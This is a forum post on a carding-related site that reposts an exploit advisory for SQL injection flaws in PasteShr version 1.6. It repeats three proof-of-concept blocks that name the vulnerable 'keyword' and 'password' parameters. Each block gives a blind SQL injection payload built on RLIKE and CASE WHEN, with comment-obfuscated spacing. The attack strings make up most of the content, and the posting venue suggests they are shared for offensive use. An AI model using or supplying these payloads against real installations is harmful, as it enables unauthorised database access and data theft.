Pasteshr 1.6 sql injection From Russian Carders

R_Alex

Well-known member
Nov 11, 2018
1,143
521
83
30
USA
www.russiancarders.se
#1
PasteShr version 1.6 suffers from multiple remote SQL injection vulnerabilities.

MD5 | 7a51baa5eca6c04a0eb42f1e84db549c

Download

Code:​
===========================================================================================​
# Exploit Title: PasteShr - SQL İnj.​
# Dork: N/A​
# Date: 14-05-2019​
# Exploit Author: Mehmet EMIROGLU​
# Vendor Homepage:​
# Software Link:​
# Version: v1.6​
# Category: Webapps​
# Tested on: Wamp64, Windows​
# CVE: N/A​
# Software Description: Pasteshr is a script which allows you to store any​
text online for easy sharing.​
The idea behind the script is to make it more convenient for people to​
share large amounts of text online.​
===========================================================================================​
# POC - SQLi​
# Parameters : keyword​
# Attack Pattern :​
%27/**/RLIKE/**/(case/**/when/**//**/9494586=9494586/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='​
Inject Here]​
===========================================================================================​
###########################################################################################​
===========================================================================================​
# Exploit Title: PasteShr - SQL İnj.​
# Dork: N/A​
# Date: 14-05-2019​
# Exploit Author: Mehmet EMIROGLU​
# Vendor Homepage:​
# Software Link:​
# Version: v1.6​
# Category: Webapps​
# Tested on: Wamp64, Windows​
# CVE: N/A​
# Software Description: Pasteshr is a script which allows you to store any​
text online for easy sharing.​
The idea behind the script is to make it more convenient for people to​
share large amounts of text online.​
===========================================================================================​
# POC - SQLi​
# Parameters : password​
# Attack Pattern :​
/**/RLIKE/**/(case/**/when/**//**/6787556=6787556/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)​
# POST Method :​
Inject Here]​
===========================================================================================​
###########################################################################################​
===========================================================================================​
# Exploit Title: PasteShr - SQL İnj.​
# Dork: N/A​
# Date: 14-05-2019​
# Exploit Author: Mehmet EMIROGLU​
# Vendor Homepage:​
# Software Link:​
# Version: v1.6​
# Category: Webapps​
# Tested on: Wamp64, Windows​
# CVE: N/A​
# Software Description: Pasteshr is a script which allows you to store any​
text online for easy sharing.​
The idea behind the script is to make it more convenient for people to​
share large amounts of text online.​
===========================================================================================​
# POC - SQLi​
# Parameters : keyword​
# Attack Pattern :​
%27/**/RLIKE/**/(case/**/when/**//**/8266715=8266715/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='​
# POST Method :​
=======================================​
Click to expand...​

Click to expand...​
====================================================
 
Last edited by a moderator:

Log in

Online statistics

Members online
4
Guests online
72
Total visitors
76